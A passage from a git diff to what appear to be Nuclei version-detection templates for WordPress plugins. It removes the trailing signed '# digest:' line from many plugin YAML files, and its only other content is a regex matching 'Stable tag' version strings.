4b0a004830460221008b5defbcea174775dd45a8313825a6f4568db4dae0efb655d79ccd45c17433c902210097766192bce8a6a311e5937d2b3d5a2fb4836582353d151d45591820872cb583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d0ebc43bf6..d86e0557ae 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210092294d136b6d863d344b5fe7764efad541745693f37388badd6c6eef348997e7022051702fb969e2cffd99d7aaefded9871048ac4aa8a1047a8ad9f49d6e1bfeb85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index f341330b16..4e20e57107 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007455a5837d79f082bf2d3c3ededb4d55538bf702d77026ed8855a13100846cb02201946c9525a48baa2be9d91d31d69e68d7b245a1ce52d675cd41fce7665496be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index c014200ffb..4ae34395fa 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022039fae3505b17910074c8fc4f847fcabb671ad32fe520800cbef2b5b71b2cdc71022100bdbdbc2b417a73a42266c2c761a5da0507c946a91e59b2f4a9f25976d68b1c7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 73938b5641..2dd0ef57b5 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f43050adb047aa8b8b5044ccc47f30524522e9933e56d866b0da609f48fff08022100f25c25503541f53783d2b20b74e7129996a3f6c543ec3807b2e849b642f3e27c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 7f84331983..11942f4fa4 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009ea29c6e5721957efa296efcb6d45f6a1b8be55a94cf8d3215b0f45a181a86e5022100fdb05dc5b5549306648b5d1460f3939db9226abd8dc50661f14aa19e048b1855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index c1f233ca74..87c2aeb4bd 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220686f362299ed53a0a6884d1ff33783edf328603d92e8539eb219634accbeb808022100c1017c0a6d8d2316c6bcfea36dce848b7eb21ce1e658bf5db36a44c36607644c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 51254c2d3c..aa36122d85 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022016b01da7a1b0598bf0bae54e6549747ccd45d010a372ba528966390949961e9e022100b4519b782615fe6543f1420a5106453598d29912ec2cc231b453de05b25bff1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index ac84610b72..8bab0a9c3e 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022030ab61dbff5632e02ff5c8866ee9c396487fd937324449002cb34daa5609af1902203f23d944d2306b89f56b17eb4f46bd7e8d430e9ea4c4d267e67119965b38b0cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index f9585bc827..affd270123 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ab335787a66bef7da7add6ceb1b130f852d66f55bf500aad77b9e9636b55e80f022070628428f3d025a62bd537571f831bbefacceb13affb6e205c06ab12964f5c26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 924e1db196..1d00a5705d 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069a94efd7f32e53b72a7fd2c64fcee192289cb5a219c69945389ad6e31d2289c022100c282e0174dd3c68cec76ad92f04639c3d8ff97341af9a1b0961db2537dea4413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index b3528f25fc..980265f531 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207a6dab933f9fe6de788bf3d4845e29eb4bf4f20cb97b794490915ddac416a5ad022100ffa97b10af3672a6bad77ec22ae96f985e51d88f623c0a16a4e0fd12476ae73b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 0bf63cf561..daf205789d 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203737257956ecfd7ca6178e02c055da2f5aed3959a21dd72eff9116d44b3224d30221009db7e05073a67d4aee3d489b352da20622fe844d4a185eef31fb2898ddb4e38d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 700393f1ee..3dbb03067b 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200fc161eb5095f9a3b90b8b778f0f36da5836fe5dfe895e121a31af0aa7a090e802205619e3ec4c9655799cca9bf1b0b5945467a56c1da49db010378baa7229fd241e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index eb667dff4d..7ed171d662 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d5862b8c261cf4eace49e2202941f016dd01150d2d83b84c011f123ac39cf26c022100951260b46595849ea171ad7a0da5de73632acca798dc7e0851ad626b05556de0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 013dbc9eb1..ad238445fc 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220404a29ef9a0bf802158382cf210919df40585338581c926acf6e6c4bc7a3494802207317c7fea0637fa520dee3c58e3c5437db9170fb951948ae8622289347d23d0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 1e8617a2a6..7161671960 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef5f20b12a730a7ec82bd14fedbfe39db9e0921b5c72ad74437f9f33a35f4fb30221009a4fe699ef2d472a1c17b5f1b3b2cbb3397a8083a89d050f3aa0f3a281d2d755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 4d31f7e12f..2678f603c6 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ce19027dc173b08d45cdc8dcb8bed783dddfc8643cf29b36c13d8c37803cf880022030d339b22fe99c654022ae1c92a378bb2c8bb6d43521b9dde34f8414b60fb597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index aac49a60dc..20d947a5d1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203961d9859eb82c15f94d022ec1cc55802232a00eb3d959bf21c57fcd91107b7b022100ec74fd1183ef413dafc4b120b3eee7d7ddfbe660345911a36e8a7594ebbad982:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 56aa29b4be..22ee97b51f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b2c06851380cf5a88c286935f82f7e03175b62ec2b0e66aff2bf81a06a72f8190221009d8ee585c8c8128ecdfe3b518bf13cf32234fd2d27f05b059b8581e7c8be31e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 88170b9c99..3f4c6c8936 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc4c8c11cc517e6ec87e522b35da769c5fc4d5bca47b53510e27643df3e7c29b02206549054ffdb9ef703bafe165e7c3e55e33012876ee30d808725cc2c86a6f1906:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index d9bc7f4944..fa1bb64115 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ece851642ba109c733aa01d4148b404231398c5cc2e050d834f94cc4957def33022100c01f0aaa4eb0d06da323accefcbb176755f80033f7af1aa1aefdb38cbcb37d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 425cd9b0d4..da63d1cbf6 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022054bc6cfc5e4dc0fa78c8d6433f71802c17618ae83cc25818653bc4caacc0198602204218587205faa3718396c62fcf91863da6ab37130bc54e4408e337481fffc85a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 04607a7802..f94e7f6494 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b132130b5c3a5685d485c03578c10d237a780cbac505ded81a2ffada4c07b24022073465989d4b7049fe61e0427669caea1893b55fdf507e9424a0dc1762705dc79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index b234723b88..95d2aa5f16 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203dcb4f10e5c50d21ef2e99af5d813277b4ac63300e19c38dd5bc1e60301080f10220708c94fd6329821c4a892e04dad99a8ca604a155e27974d863b7a811f098e974:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3e44f01641..af8193b875 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bd3fae995dea10a9fc4432bacbc704e57a7b4fb84c1e7fcade4a6393ca73b69c022100af22b0492f77ddad453919bf052a8731564f2bced7a9a93ba58a99ce44d8597e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 2d5bfcde38..8d7e45818b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f90da1d7cb20b2f0148b7253b25afc1402d9a33dd8859bdb0299ba24164997d7022100f0f66d0d91d0552a8d8bb50a80dddfd91d0e7c1e264859b227caf6972fc8f30a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index f7819f7f85..ed3967db7b 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203cfc77ee657fa6bf6f4847c6bdfa3ce84ec7dded5507566fbcf615ca48415d38022044622c6f325f8f3e0fd42e6f5f42b22c464c2568609dc87d7c3fc939a39e897f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 8d0343d4ce..cd248e018b 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100899aee8242911f0ca126bbe1560ae0b434a0447db4a4ae32a477a980d9c1721c022100d164ea05724291dcfaa9cde37ef5f811ff8a775eb1e9d42a90428a2b7b27288d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index acd33a1fb5..0993372ced 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202aa8a7d2112461b7e4e20ab727c61f72bf1770ebe35532d6c31630c010309701022100ec3f3d15bc8cc5bf031696d1a434ced47538cb9d1944da2aefdd1a9a584a43d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2aa181c355..7e62a84cca 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210086875c5c4254b27f17fbe6f9a737672a539137bab1e8e38871000630ac62cfe2022100c8c0d8b29928aa74e33054c3a1d36f36f13f21090e7f084f0cc958031c5d5600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 0873e30478..9099f3c0a5 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022032087edaa071f743492eafeb4c111f7a078aa8933bcb0fcc41897ca0c542c390022060f8a671b78c96c368bbb19f92084bf1861c1c37d57f311e4ce22e0943588119:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ade333bca..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021af03fc1f5804459179224717997f824cafb654cfbaf7514dcdb6a43052f8160220716e6ddc87d27849febbec984485a0464933a555042d0d1860fd5d16615b88e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 0c681c40be..c7ae2d51dd 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1303be23f9d33a26254d80aaa74869b8942a3c3377825c0611b039cacd3e58902205dfc37b55914d62c1b9497bb9c00d13f5e5bc479421f26637e111160532332ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index d446a6eec5..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000de9e9c235016113e08dae840a153cd0c21de047ae86dac90ae987230ed99e1022100cc0f03badc2132a521ca8d5864e5e46e0827a13f4ff12601fc6e56ca958ac4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 161133ba33..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022069e677dfce5c639725692d7b15b7f72defd27b97b60df33884a8e598dd97cdf702203784289a2916628a6cb135ae3e7437fb4e212513ef48f8dd2fc2161e562a818f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 318d640d60..3e89505574 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100822cd958e14f9f2bd55b797469cd05c3770d4f6feee5a6ef2527a1e9b12c5c55022100d3c4350ed58e9c1f709d69813a0ef1d6ddb87072be2fbbd9515564d3a29e9dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 993e5286c7..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c7a28aee8e038ddb21b1689f13d7bc8614644c4934f25e2d22a6f33d3d72060c02200b3fe331d883773cdd236c6ca38da992d105a368724064033f30a8565deddb94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 68e202637d..299e5e4cb6 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100888c0a2411dff95c1403be294c7ea4edf714a5895be2cb684c666b9f771bb4b3022042a25fb458c1c92995f567ca52b740184543d6318776dcdfc46b3f4edea144c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 5f741768b5..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f8cd64804a50a795d3396c4e99e988b5532a507e90d547e33ed57acbbd428a5702207b555faecd83b2893d01173abe13f6194a9182e9c8137f2a59b90e274ac32d45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index f962991d3b..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d948449666993f2ecfe4e988eece348845152b3972eb7175767326fbda1500a302201b560d4c47c8e1d13bd53a378baffe5d23980ddb17847ee3b81aa015eb5df8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41fe01554a..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ed3a8d60db4bec2f6294acdbd79faf491a8056a090278516f35210b7c192620802200fa09e9f9a81d9a052e4a8075a4d387a186534f263c1dfbe2cb5752af36279e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index a4a6d5f448..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e23f6efc616cc6f7b454460298acf182c6d15bea577924d5f46ada7887dc543a022100f563453bab4af0447c875a570d1b38b6cb37e25506af2cf971cf938b313cb7ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 397d846342..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220397f4055b0eea858a5f81cc976a81ab4d5c5c9085abf712c7c4eb25fd2458119022100ef9e17d59b3367bf33f82e59015c05fa0850171c12bf7b18460951e0009e47bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 549b1cf682..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022007538c05f25abdaca40e09c268ca7ce7406168f9dcf0ab73005c10b8ba242ea802205258edde22e1fbd4c8874344a75af98ceae8608dd8670643c601e3367e55cf07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 9aba7e6102..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022017ce7acfcfdf89d2794284511dea6fec142f0bab6caaa1b8ee41f5b3932a7482022100c01a940ca075abe026c1ccf2c750a094fab4650c109b283876eeba96be6a33c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 8acd64c01d..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220478abe05b63eda6884e1cc678293417193b14bf407af3badc9b6f6762f81bf8202202b21ee4d66bbdfbc916055ccd2db378a75f8a5eeaee3be32532802ad4f6391cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index a9df68e9d3..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,4 +47,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 